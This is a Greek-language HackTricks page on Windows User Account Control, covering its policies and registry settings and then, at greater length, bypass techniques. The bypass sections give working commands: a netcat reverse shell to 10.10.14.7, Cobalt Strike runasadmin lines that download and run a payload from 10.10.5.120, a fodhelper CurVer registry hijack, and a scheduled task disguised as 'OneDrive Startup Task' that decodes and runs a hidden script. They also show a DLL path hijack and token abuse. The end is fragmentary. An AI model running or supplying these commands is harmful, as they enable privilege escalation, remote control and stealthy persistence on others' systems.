UAC - User Account Control

Tip

Μάθε & εξασκήσου στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθε & εξασκήσου στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθε & εξασκήσου στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Περιηγήσου στον πλήρη κατάλογο HackTricks Training για τα assessment tracks (ARTA/GRTA/AzRTA) και στο Linux Hacking Expert (LHE).

Υποστήριξε το HackTricks

• Δες τα subscription plans!
• Γίνε μέλος της 💬 Discord group, της telegram group, ακολούθησε το @hacktricks_live στο X/Twitter, ή δες τη LinkedIn page και το YouTube channel.
• Μοιράσου hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

UAC

User Account Control (UAC) είναι μια δυνατότητα που επιτρέπει ένα consent prompt για elevated activities. Οι εφαρμογές έχουν διαφορετικά επίπεδα integrity, και ένα πρόγραμμα με υψηλό επίπεδο μπορεί να εκτελέσει εργασίες που θα μπορούσαν δυνητικά να θέσουν σε κίνδυνο το σύστημα. Όταν το UAC είναι ενεργοποιημένο, οι εφαρμογές και οι εργασίες πάντα εκτελούνται υπό το security context ενός non-administrator account εκτός αν ένας administrator τις εξουσιοδοτήσει ρητά να έχουν administrator-level access στο σύστημα για να εκτελεστούν. Είναι ένα feature ευκολίας που προστατεύει τους administrators από ακούσιες αλλαγές, αλλά δεν θεωρείται security boundary.

Για περισσότερες πληροφορίες σχετικά με τα integrity levels:

Integrity Levels

Όταν υπάρχει UAC, σε έναν administrator user δίνονται 2 tokens: ένα standard user key, για να εκτελεί συνηθισμένες ενέργειες ως regular level, και ένα με τα admin privileges.

Αυτή η page συζητά σε μεγάλο βάθος πώς λειτουργεί το UAC και περιλαμβάνει το logon process, το user experience και το UAC architecture. Οι administrators μπορούν να χρησιμοποιήσουν security policies για να ρυθμίσουν πώς λειτουργεί το UAC ειδικά για τον οργανισμό τους στο local level (χρησιμοποιώντας το secpol.msc), ή να το ρυθμίσουν και να το προωθήσουν μέσω Group Policy Objects (GPO) σε περιβάλλον Active Directory domain. Οι διάφορες ρυθμίσεις συζητούνται αναλυτικά εδώ. Υπάρχουν 10 Group Policy settings που μπορούν να οριστούν για το UAC. Ο ακόλουθος πίνακας παρέχει επιπλέον λεπτομέρειες:

Policies for installing software on Windows

Οι local security policies (“secpol.msc” στα περισσότερα συστήματα) ρυθμίζονται από προεπιλογή ώστε να αποτρέπουν non-admin users από το να πραγματοποιούν software installations. Αυτό σημαίνει ότι ακόμα κι αν ένας non-admin user μπορεί να κατεβάσει τον installer για το software σας, δεν θα μπορεί να το εκτελέσει χωρίς έναν admin account.

Registry Keys to Force UAC to Ask for Elevation

Ως standard user χωρίς admin rights, μπορείς να διασφαλίσεις ότι ο “standard” account θα ζητά credentials από το UAC όταν επιχειρεί να εκτελέσει ορισμένες ενέργειες. Αυτή η ενέργεια θα απαιτούσε τροποποίηση συγκεκριμένων registry keys, για τις οποίες χρειάζεσαι admin permissions, εκτός αν υπάρχει ένα UAC bypass, ή αν ο attacker είναι ήδη συνδεδεμένος ως admin.

Ακόμα κι αν ο user ανήκει στην ομάδα Administrators, αυτές οι αλλαγές αναγκάζουν τον user να εισάγει ξανά τα account credentials του ώστε να εκτελέσει administrative actions.

Το μόνο μειονέκτημα είναι ότι αυτή η προσέγγιση χρειάζεται το UAC να είναι απενεργοποιημένο για να λειτουργήσει, κάτι που είναι απίθανο να ισχύει σε production environments.

Τα registry keys και τα entries που πρέπει να αλλάξεις είναι τα ακόλουθα (με τις default τιμές τους σε παρενθέσεις):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

Αυτό μπορεί επίσης να γίνει χειροκίνητα μέσω του Local Security Policy tool. Μόλις αλλάξουν, οι administrative operations ζητούν από τον user να εισαγάγει ξανά τα credentials του.

Note

User Account Control is not a security boundary. Επομένως, οι standard users δεν μπορούν να ξεφύγουν από τους λογαριασμούς τους και να αποκτήσουν administrator rights χωρίς ένα local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Privileges

• Το Internet Explorer Protected Mode χρησιμοποιεί integrity checks για να αποτρέπει processes υψηλού integrity level (όπως web browsers) από το να έχουν πρόσβαση σε δεδομένα χαμηλού integrity level (όπως ο φάκελος temporary Internet files). Αυτό γίνεται με την εκτέλεση του browser με low-integrity token. Όταν ο browser προσπαθεί να αποκτήσει πρόσβαση σε δεδομένα που είναι αποθηκευμένα στη low-integrity zone, το operating system ελέγχει το integrity level του process και επιτρέπει την πρόσβαση ανάλογα. Αυτή η δυνατότητα βοηθά στην αποτροπή attacks remote code execution από το να αποκτούν πρόσβαση σε ευαίσθητα δεδομένα στο system.
• Όταν ένας user κάνει logon στα Windows, το system δημιουργεί ένα access token που περιέχει μια λίστα με τα privileges του user. Τα privileges ορίζονται ως ο συνδυασμός των rights και των capabilities του user. Το token περιέχει επίσης μια λίστα με τα credentials του user, τα οποία χρησιμοποιούνται για να authenticate τον user στον computer και σε resources στο network.

Autoadminlogon

Για να ρυθμίσετε τα Windows ώστε να κάνουν automatically log on έναν συγκεκριμένο user κατά την εκκίνηση, ορίστε το AutoAdminLogon registry key. Αυτό είναι χρήσιμο για kiosk environments ή για testing purposes. Χρησιμοποιήστε το μόνο σε secure systems, καθώς εκθέτει το password στο registry.

Ορίστε τα ακόλουθα keys χρησιμοποιώντας το Registry Editor ή reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Για να επαναφέρετε τη φυσιολογική συμπεριφορά logon, ορίστε το AutoAdminLogon σε 0.

UAC bypass

Tip

Σημειώστε ότι αν έχετε graphical access στο victim, το UAC bypass είναι straight forward, καθώς μπορείτε απλώς να κάνετε click στο “Yes” όταν εμφανιστεί το UAC prompt

Το UAC bypass χρειάζεται στην ακόλουθη περίπτωση: το UAC είναι ενεργοποιημένο, το process σας εκτελείται σε medium integrity context, και ο user σας ανήκει στην administrators group.

Είναι σημαντικό να αναφερθεί ότι είναι πολύ πιο δύσκολο να παρακάμψετε το UAC αν βρίσκεται στο υψηλότερο επίπεδο security (Always) σε σχέση με οποιοδήποτε από τα άλλα επίπεδα (Default).

UAC disabled

Αν το UAC είναι ήδη απενεργοποιημένο (ConsentPromptBehaviorAdmin είναι 0) μπορείτε να εκτελέσετε ένα reverse shell με admin privileges (high integrity level) χρησιμοποιώντας κάτι σαν:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Πολύ Βασικό UAC “bypass” (πλήρης πρόσβαση στο file system)

Αν έχεις ένα shell με έναν user που ανήκει στο Administrators group μπορείς να mount the C$ shared μέσω SMB (file system) local σε έναν νέο δίσκο και θα έχεις πρόσβαση σε όλα μέσα στο file system (ακόμα και στο home folder του Administrator).

Warning

Φαίνεται ότι αυτό το trick δεν λειτουργεί πλέον

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

Παράκαμψη UAC με cobalt strike

Οι τεχνικές Cobalt Strike θα λειτουργήσουν μόνο αν το UAC δεν είναι ρυθμισμένο στο μέγιστο επίπεδο ασφάλειας του

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire και Metasploit έχουν επίσης αρκετά modules για να bypass το UAC.

KRBUACBypass

Documentation και tool στο https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME που είναι μια compilation από διάφορα UAC bypass exploits. Σημείωσε ότι θα χρειαστεί να compile UACME using visual studio or msbuild. Το compilation θα δημιουργήσει αρκετά executables (όπως Source\Akagi\outout\x64\Debug\Akagi.exe) , θα χρειαστεί να ξέρεις ποιο από αυτά χρειάζεσαι.
Θα πρέπει να προσέχεις γιατί κάποια bypasses θα promtp κάποια άλλα programs που θα alert τον user ότι κάτι συμβαίνει.

Το UACME έχει το build version from which each technique started working. Μπορείς να κάνεις search για μια technique που επηρεάζει τις εκδόσεις σου:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Επίσης, χρησιμοποιώντας αυτή τη σελίδα this παίρνεις το Windows release 1607 από τα build versions.

UAC Bypass – fodhelper.exe (Registry hijack)

Το trusted binary fodhelper.exe έχει auto-elevated σε σύγχρονα Windows. Όταν εκκινείται, κάνει query το παρακάτω per-user registry path χωρίς να επαληθεύει το DelegateExecute verb. Το να βάλεις εκεί μια command επιτρέπει σε ένα Medium Integrity process (ο χρήστης είναι στο Administrators) να δημιουργήσει ένα High Integrity process χωρίς UAC prompt.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Σημειώσεις:
- Λειτουργεί όταν ο τρέχων χρήστης είναι μέλος των Administrators και το επίπεδο UAC είναι default/lenient (όχι Always Notify με επιπλέον περιορισμούς).
- Χρησιμοποίησε το `sysnative` path για να ξεκινήσεις ένα 64-bit PowerShell από ένα 32-bit process σε 64-bit Windows.
- Το Payload μπορεί να είναι οποιαδήποτε εντολή (PowerShell, cmd, ή ένα EXE path). Απόφυγε UIs που κάνουν prompt για stealth.

#### CurVer/extension hijack variant (HKCU only)

Recent samples abusing `fodhelper.exe` αποφεύγουν το `DelegateExecute` και αντί να το κάνουν αυτό **redirect το `ms-settings` ProgID** μέσω της per-user τιμής `CurVer`. Το auto-elevated binary εξακολουθεί να επιλύει το handler κάτω από το `HKCU`, οπότε δεν χρειάζεται admin token για να φυτέψεις τα keys:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"